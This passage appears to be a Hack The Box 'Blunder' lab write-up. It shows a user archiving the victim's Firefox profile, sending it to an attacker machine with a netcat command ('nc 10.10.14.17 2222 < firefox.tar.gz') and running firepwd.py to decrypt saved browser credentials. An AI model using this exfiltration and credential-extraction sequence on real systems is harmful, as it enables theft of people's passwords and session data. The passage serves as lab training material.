Firefox
hugo@blunder:~$ ll
total 80
drwxr-xr-x 16 hugo hugo 4096 May 26 2020 ./
drwxr-xr-x 4 root root 4096 Apr 27 2020 ../
lrwxrwxrwx 1 root root 9 Apr 28 2020 .bash_history -> /dev/null
-rw-r--r-- 1 hugo hugo 220 Nov 28 2019 .bash_logout
-rw-r--r-- 1 hugo hugo 3771 Nov 28 2019 .bashrc
drwx------ 13 hugo hugo 4096 Apr 27 2020 .cache/
drwx------ 11 hugo hugo 4096 Nov 28 2019 .config/
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Desktop/
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Documents/
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Downloads/
drwx------ 3 hugo hugo 4096 Apr 27 2020 .gnupg/
drwxrwxr-x 3 hugo hugo 4096 Nov 28 2019 .local/
drwx------ 5 hugo hugo 4096 Apr 27 2020 .mozilla/
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Music/
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Pictures/
-rw-r--r-- 1 hugo hugo 807 Nov 28 2019 .profile
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Public/
drwx------ 2 hugo hugo 4096 Apr 27 2020 .ssh/
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Templates/
-r-------- 1 hugo hugo 33 sep 18 05:34 user.txt
drwxr-xr-x 2 hugo hugo 4096 Nov 28 2019 Videos/After making a lateral movement, I found out that the hugo user has the .mozilla directory present in the home directory
hugo@blunder:~$ ll .mozilla/
total 20
drwx------ 5 hugo hugo 4096 Apr 27 2020 ./
drwxr-xr-x 16 hugo hugo 4096 May 26 2020 ../
drwx------ 2 hugo hugo 4096 Apr 27 2020 extensions/
drwx------ 6 hugo hugo 4096 Apr 27 2020 firefox/
drwx------ 2 hugo hugo 4096 Apr 27 2020 systemextensionsdev/
hugo@blunder:~$ ll .mozilla/firefox
total 32
drwx------ 6 hugo hugo 4096 Apr 27 2020 ./
drwx------ 5 hugo hugo 4096 Apr 27 2020 ../
drwx------ 2 hugo hugo 4096 Apr 27 2020 1z12g2ez.default/
drwx------ 12 hugo hugo 4096 Jul 5 2021 2wqko0wa.default-release/
drwx------ 3 hugo hugo 4096 May 19 2020 'Crash Reports'/
-rw-r--r-- 1 hugo hugo 62 Apr 27 2020 installs.ini
drwx------ 2 hugo hugo 4096 Apr 27 2020 'Pending Pings'/
-rw-r--r-- 1 hugo hugo 259 Apr 27 2020 profiles.ini
hugo@blunder:~$ ll .mozilla/firefox/2wqko0wa.default-release/
total 7840
drwx------ 12 hugo hugo 4096 Jul 5 2021 ./
drwx------ 6 hugo hugo 4096 Apr 27 2020 ../
-rw------- 1 hugo hugo 1989 Jul 5 2021 addons.json
-rw------- 1 hugo hugo 2879 Jul 5 2021 addonStartup.json.lz4
-rw-r--r-- 1 hugo hugo 0 Jul 5 2021 AlternateServices.txt
drwx------ 2 hugo hugo 4096 May 19 2020 bookmarkbackups/
-rw------- 1 hugo hugo 216 Jul 5 2021 broadcast-listeners.json
-rw------- 1 hugo hugo 229376 Jul 5 2021 cert9.db
-rw------- 1 hugo hugo 162 May 19 2020 compatibility.ini
-rw------- 1 hugo hugo 939 Apr 27 2020 containers.json
-rw-r--r-- 1 hugo hugo 229376 Apr 27 2020 content-prefs.sqlite
-rw-r--r-- 1 hugo hugo 524288 Jul 5 2021 cookies.sqlite
drwx------ 3 hugo hugo 4096 Jul 5 2021 crashes/
drwx------ 3 hugo hugo 4096 Jul 5 2021 datareporting/
-rw------- 1 hugo hugo 1206 Apr 27 2020 extension-preferences.json
drwx------ 2 hugo hugo 4096 Apr 27 2020 extensions/
-rw------- 1 hugo hugo 48044 Jul 5 2021 extensions.json
-rw-r--r-- 1 hugo hugo 5242880 Jul 5 2021 favicons.sqlite
-rw-r--r-- 1 hugo hugo 196608 Jul 5 2021 formhistory.sqlite
drwxr-xr-x 3 hugo hugo 4096 Apr 27 2020 gmp-gmpopenh264/
-rw------- 1 hugo hugo 545 Apr 27 2020 handlers.json
-rw------- 1 hugo hugo 294912 Apr 27 2020 key4.db
drwx------ 2 hugo hugo 4096 Apr 27 2020 minidumps/
-rw-r--r-- 1 hugo hugo 0 Jul 5 2021 .parentlock
-rw-r--r-- 1 hugo hugo 98304 Jul 5 2021 permissions.sqlite
-rw------- 1 hugo hugo 476 Apr 27 2020 pkcs11.txt
-rw-r--r-- 1 hugo hugo 5242880 Jul 5 2021 places.sqlite
-rw------- 1 hugo hugo 9878 Jul 5 2021 prefs.js
-rw-r--r-- 1 hugo hugo 65536 Jul 5 2021 protections.sqlite
drwx------ 2 hugo hugo 4096 Jul 5 2021 saved-telemetry-pings/
-rw------- 1 hugo hugo 9981 Jul 5 2021 search.json.mozlz4
-rw-r--r-- 1 hugo hugo 0 Jul 5 2021 SecurityPreloadState.txt
drwxr-xr-x 2 hugo hugo 4096 Apr 27 2020 security_state/
-rw-r--r-- 1 hugo hugo 161 May 19 2020 serviceworker.txt
-rw------- 1 hugo hugo 288 Jul 5 2021 sessionCheckpoints.json
drwx------ 2 hugo hugo 4096 Jul 5 2021 sessionstore-backups/
-rw------- 1 hugo hugo 4648 Jul 5 2021 sessionstore.jsonlz4
-rw------- 1 hugo hugo 18 Apr 27 2020 shield-preference-experiments.json
-rw------- 1 hugo hugo 84 Apr 29 2020 shield-recipe-client.json
-rw-r--r-- 1 hugo hugo 2560 Jul 5 2021 SiteSecurityServiceState.txt
drwxr-xr-x 5 hugo hugo 4096 Apr 27 2020 storage/
-rw-r--r-- 1 hugo hugo 4096 Jul 5 2021 storage.sqlite
-rw------- 1 hugo hugo 50 Apr 27 2020 times.json
-rw-r--r-- 1 hugo hugo 0 Jul 5 2021 TRRBlacklist.txt
-rw-r--r-- 1 hugo hugo 163840 Jul 5 2021 webappsstore.sqlite
-rw------- 1 hugo hugo 140 Jul 5 2021 xulstore.jsonThe user has a Firefox profile; 2wqko0wa.default-release
If the user has ever authenticated, I will be able to extract the credentials
hugo@blunder:~$ tar -czf firefox.tar.gz .mozilla/firefox/2wqko0wa.default-release/
hugo@blunder:~$ nc 10.10.14.17 2222 < firefox.tar.gz
┌──(kali㉿kali)-[~/…/labs/blunder/firepwd/hugo]
└─$ nnc 2222 > firefox.tar.gz
listening on [any] 2222 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.191] 55892
┌──(kali㉿kali)-[~/…/labs/blunder/firepwd/hugo]
└─$ tar -xf firefox.tar.gzTransfer complete
firepwd.py
┌──(kali㉿kali)-[~/…/htb/labs/blunder/firepwd]
└─$ python3 firepwd.py -d hugo/.mozilla/firefox/2wqko0wa.default-release
globalSalt: b'86f17cfde971ec91d6b1da3f94e25528349b1f85'
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
SEQUENCE {
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
SEQUENCE {
OCTETSTRING b'ec0ad08e0cd81a78fa1608b6021f56fc16d5df15e627eaed832d2eff86850f1f'
INTEGER b'01'
INTEGER b'20'
SEQUENCE {
OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
}
}
}
SEQUENCE {
OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
OCTETSTRING b'8a571cec61089ebbe814b8d29091'
}
}
}
OCTETSTRING b'6566b0ae4c61b75da02849b16578b612'
}
clearText b'70617373776f72642d636865636b0202'
password check? True
no saved login/passwordfirepwd.py was able to decrypt the encrypted string, but the result doesn’t appear to be “CLEARTEXT”; 70617373776f72642d636865636b0202